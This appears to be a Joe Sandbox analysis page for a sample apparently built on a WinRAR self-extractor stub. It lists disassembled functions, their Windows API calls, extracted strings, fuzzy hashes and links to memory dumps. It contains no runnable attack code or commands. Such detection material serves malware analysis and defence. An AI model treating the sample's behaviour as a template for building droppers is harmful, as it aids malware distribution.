Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID: h9
API String ID: 161543041-554728239
Opcode ID: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
Instruction ID: d2c217fe15187b72ee245c6186fb6734c74bfa3ce5e9ae65b32cdb5d6d4b3ab5
Opcode Fuzzy Hash: 36ba1aee02b6e554c74fac25baeaa83e669c2acfadc22f14b2ba0ad6e5ae8524
Instruction Fuzzy Hash: 05315A316107459FEB23BB38D846B5AB7FAAF10310F6164A9E048DA292DF30AC45CB20

Function 003896F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00389705

Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4

_free.LIBCMT ref: 00389711
_free.LIBCMT ref: 0038971C
_free.LIBCMT ref: 00389727
_free.LIBCMT ref: 00389732
_free.LIBCMT ref: 0038973D
_free.LIBCMT ref: 00389748
_free.LIBCMT ref: 00389753
_free.LIBCMT ref: 0038975E
_free.LIBCMT ref: 0038976C

Strings

0d9, xrefs: 003896FC

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 0d9
API String ID: 776569668-2243828265
Opcode ID: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
Instruction ID: 223f141fb98f491d8d54d07eedacea47b7ba0bffd7687a7d648b3de2531fdc7a
Opcode Fuzzy Hash: 274b5b4d5167f9761c38dce0868d1cb8bc80fe55fbe939276279225de372ec60
Instruction Fuzzy Hash: 1811B376110249BFCB02FF94C982DDD3BB6EF14350B9154A1FA088F262DE32EE559B84

Function 00379711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00379736
_wcslen.LIBCMT ref: 003797D6
GlobalAlloc.KERNEL32(00000040,?), ref: 003797E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00379806
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0037982D

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 00379760
utf-8"></head>, xrefs: 0037976B
Fjun7, xrefs: 0037982D
</html>, xrefs: 003797B7
<html>, xrefs: 00379755, 0037978E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
String ID: Fjun7$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1777411235-1321622670
Opcode ID: d7702563aae3b3fe26c5c2fc6d3e8010393027edace6e452e13d61316b1fac38
Instruction ID: 61e0917fc0647e54ce2e01b2185d925ee6898d4556ce7db39360d78848ec572c
Opcode Fuzzy Hash: d7702563aae3b3fe26c5c2fc6d3e8010393027edace6e452e13d61316b1fac38
Instruction Fuzzy Hash: DA3125321083117AEB37BB649C46FAB779CDF43720F15421FF5059A1D2EB68DA0583A6

Function 0037D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0037D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0037D6ED

Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0037D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0037D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0037D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0037D75D
DeleteObject.GDI32(00000000), ref: 0037D764
GetWindow.USER32(00000000,00000002), ref: 0037D76D

Strings

STATIC, xrefs: 0037D6F3

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
Instruction ID: 9b32b17b59045dff4f65d8cb4263aed1c71b8913f68cc86d47ba9e4f5b2297f6
Opcode Fuzzy Hash: 0d2d8b4652f1c25b25fc693dc3a59d90b1d9e588a27f5b7616b7daad19fe6a79
Instruction Fuzzy Hash: C41121731007607FE6337B709C4AFAF766CAF44751F01C120FA4AEA091DA689A0556A6

Function 00382E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00382F50
___TypeMatch.LIBVCRUNTIME ref: 0038305E
_UnwindNestedFrames.LIBCMT ref: 003831B0
CallUnexpected.LIBVCRUNTIME ref: 003831CB
_abort.LIBCMT ref: 003831D0

Strings

csm, xrefs: 00382E6E
csm, xrefs: 00382F87
csm, xrefs: 00382EDB

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
Instruction ID: 0145e014c49bcc446669f86444e7c1c239d8a1eb58b13eced782fff9d9279981
Opcode Fuzzy Hash: 7d12f571a49bad8ee25b87953de65253c33eab3c4e4dd38d2b6e183ab11da264
Instruction Fuzzy Hash: D6B15575800309EFCF2AFFA4C8859AFBBB5BF14B10B15419AE8056B312D735DA51CB91

Function 0036AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0036AF29

Strings

WQL, xrefs: 0036AFDC
n7, xrefs: 0036AFC0
SELECT * FROM Win32_OperatingSystem, xrefs: 0036AFCA
Name, xrefs: 0036B0B0
Windows 10, xrefs: 0036B0C2
ROOT\CIMV2, xrefs: 0036AF5C

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n7
API String ID: 3519838083-1258877181
Opcode ID: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
Instruction ID: b801edb2f40fc564b1e0a9c92ee9ad070567d51cea78767f89f65ef547e86f72
Opcode Fuzzy Hash: 74572c897101a63615dfe1f930d42f306f037ea6874297c1ab322b0463bca02b
Instruction Fuzzy Hash: 50715B71A00619AFDF16DFA8CC959AFBBB9FF48310B044559E512E72A0CB31AD41CF60

Function 00366FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00366FAA
_wcslen.LIBCMT ref: 00367013
_wcslen.LIBCMT ref: 00367084

Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00

Strings

SeCreateSymbolicLinkPrivilege, xrefs: 00366FCC
\??\, xrefs: 0036702B
UNC\, xrefs: 00367051
SeRestorePrivilege, xrefs: 00366FC2

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: 09b7e828c9bb1f4fdea96a29f333cd80a7f0e9c6662353a09f8160b0d78f85ae
Instruction ID: 6b6bda3a5ad7a7ec329c240031c42dba128a26fa8d24cfeb2e1696c6da344ad9
Opcode Fuzzy Hash: 09b7e828c9bb1f4fdea96a29f333cd80a7f0e9c6662353a09f8160b0d78f85ae
Instruction Fuzzy Hash: C1413BB1D087447AEF33E7709C42FEEB36C9F05348F408455FA55AA286D674AA448B31

Function 0037B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370

EndDialog.USER32(?,00000001), ref: 0037B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0037B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0037B650
SetWindowTextW.USER32(?,?), ref: 0037B661
GetDlgItem.USER32(?,00000065), ref: 0037B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0037B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0037B694

Strings

LICENSEDLG, xrefs: 0037B5D4

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 178e58efa4463fb0a37d1628411471cb3a44ba14e6a3a53506e24f9ba079f23d
Instruction ID: 808de1ce296c5d0a778fa1705c40915954bf6d828be70c9ecc176d2c6369fe30
Opcode Fuzzy Hash: 178e58efa4463fb0a37d1628411471cb3a44ba14e6a3a53506e24f9ba079f23d
Instruction Fuzzy Hash: 3021D632204218BFD6236B65EC49F7B7B7CEB4AB85F02C014F709E65A0CB56A9019735

Function 0037FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,BD087715,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE14
SysAllocString.OLEAUT32(00000000), ref: 0037FE1F
_com_issue_error.COMSUPP ref: 0037FE48
_com_issue_error.COMSUPP ref: 0037FE52
GetLastError.KERNEL32(80070057,BD087715,00000001,00000000,00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE57
_com_issue_error.COMSUPP ref: 0037FE6A
GetLastError.KERNEL32(00000000,?,?,0036AF6C,ROOT\CIMV2), ref: 0037FE80
_com_issue_error.COMSUPP ref: 0037FE93

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: ee08f03a51424f321b5f04387fab2daf733b9a1baedceb91c00941f158933a06
Instruction ID: 5a4201071040786365f47383206bfa696e5d0a46e1926bd269423af698b77b93
Opcode Fuzzy Hash: ee08f03a51424f321b5f04387fab2daf733b9a1baedceb91c00941f158933a06
Instruction Fuzzy Hash: 6641CCB1A00215EFDB229F64CC45BAFB7A8FF44710F10827AF919E7651D7399900C7A5

Function 00369382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00369387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 003693AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 003693C9

Part of subcall function 0036C29A: _wcslen.LIBCMT ref: 0036C2A2

Part of subcall function 00371FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0036C116,00000000,.exe,?,?,00000800,?,?,?,00378E3C), ref: 00371FD1

_swprintf.LIBCMT ref: 00369465

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

MoveFileW.KERNEL32(?,?), ref: 003694D4
MoveFileW.KERNEL32(?,?), ref: 00369514

Strings

rtmp%d, xrefs: 0036944E

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 683246bfa98e8fba2d57cd0fbdbde78042f78a11d61d984085c639077656674b
Instruction ID: 00108c9c8ec5415db0e32dbbd43f73687448d6260f0222137f414dc3a19af6da
Opcode Fuzzy Hash: 683246bfa98e8fba2d57cd0fbdbde78042f78a11d61d984085c639077656674b
Instruction Fuzzy Hash: 504177B1900258A5DF23EB61CD55FEE737CAF45740F00C8A6B64AE7155DB388B898B60

Function 00361100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0036112B
_wcslen.LIBCMT ref: 00361153
_wcslen.LIBCMT ref: 00361182
_wcslen.LIBCMT ref: 003611A9

Strings

p7, xrefs: 00361205, 00361233
z7, xrefs: 00361219
U7, xrefs: 0036120D, 0036123B

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: _wcslen
String ID: U7$p7$z7
API String ID: 176396367-3179075045
Opcode ID: 254e4c30cb83f6dc38ac31aa9301da3b2f1e24438fca564fbc97258da82e9109
Instruction ID: 23e00f1cb78c102a2918df415b6aaa91b44ddf80a76c7ed3cba2d1b8ced83ebe
Opcode Fuzzy Hash: 254e4c30cb83f6dc38ac31aa9301da3b2f1e24438fca564fbc97258da82e9109
Instruction Fuzzy Hash: 4841B6719006699BCB26AF68CC159DFBBBCEF01311F058019F946F7245DB34AE458BA0

Function 00379ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 00379EEE
GetWindowRect.USER32(?,00000000), ref: 00379F44
ShowWindow.USER32(?,00000005,00000000), ref: 00379FDB
SetWindowTextW.USER32(?,00000000), ref: 00379FE3
ShowWindow.USER32(00000000,00000005), ref: 00379FF9

Strings

7, xrefs: 00379F52, 00379F87
RarHtmlClassName, xrefs: 00379FA5

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Window$Show$RectText
String ID: 7$RarHtmlClassName
API String ID: 3937224194-370341044
Opcode ID: 3140e294efc35f005f4491365d00a2d4f88b13942a758055424caedede7d2930
Instruction ID: f69b7a7f50432805bf5da223437626acb393e0495c5109055a2302a1ca8d6d8d
Opcode Fuzzy Hash: 3140e294efc35f005f4491365d00a2d4f88b13942a758055424caedede7d2930
Instruction Fuzzy Hash: B841AF32008314EFCB23AF649C48F6B7BACEF48702F05C659F8499A156DB38E904DB61

Function 00371218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0037122E

Part of subcall function 0036B146: GetVersionExW.KERNEL32(?), ref: 0036B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 00371251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 00371263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00371274
SystemTimeToFileTime.KERNEL32(?,?), ref: 00371284
SystemTimeToFileTime.KERNEL32(?,?), ref: 00371294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 003712CF
__aullrem.LIBCMT ref: 00371379

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
Instruction ID: a324559b808e068a019df5012837949852d5623d57ca928de80683eda7dd0bc3
Opcode Fuzzy Hash: 43e78a912b511cc4ebf3097787fb09253fb26a9a28d6c74b0e54ccffe16df1d6
Instruction Fuzzy Hash: 9B4118B6508305AFD711DF69C88496BBBF9FF88314F00892EF59AC6210E739E649CB51

Function 00362210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00362536

Part of subcall function 00364092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003640A5

Part of subcall function 003705DA: _wcslen.LIBCMT ref: 003705E0

Strings

xc%u, xrefs: 0036275A
;%u, xrefs: 00362523
x%u, xrefs: 003626FD

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 8d563ee1c3ea45da8f95b4405fb96fbce0d0a9910441c761d781c708ca310319
Instruction ID: 49d3e63ba858cedbed4ae221c08d13dc5ac126d87125323100fd59693346f4ba
Opcode Fuzzy Hash: 8d563ee1c3ea45da8f95b4405fb96fbce0d0a9910441c761d781c708ca310319
Instruction Fuzzy Hash: 19F125716047409BCB27DB288895BFB77995F90300F0AC569EDCA9F28BCB648945C762

Function 00379CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00379D0A

Strings

</style>, xrefs: 00379E52
<style>, xrefs: 00379E30
>, xrefs: 00379D4B
</p>, xrefs: 00379DE8
<br>, xrefs: 00379DFE

Memory Dump Source

Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true

Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
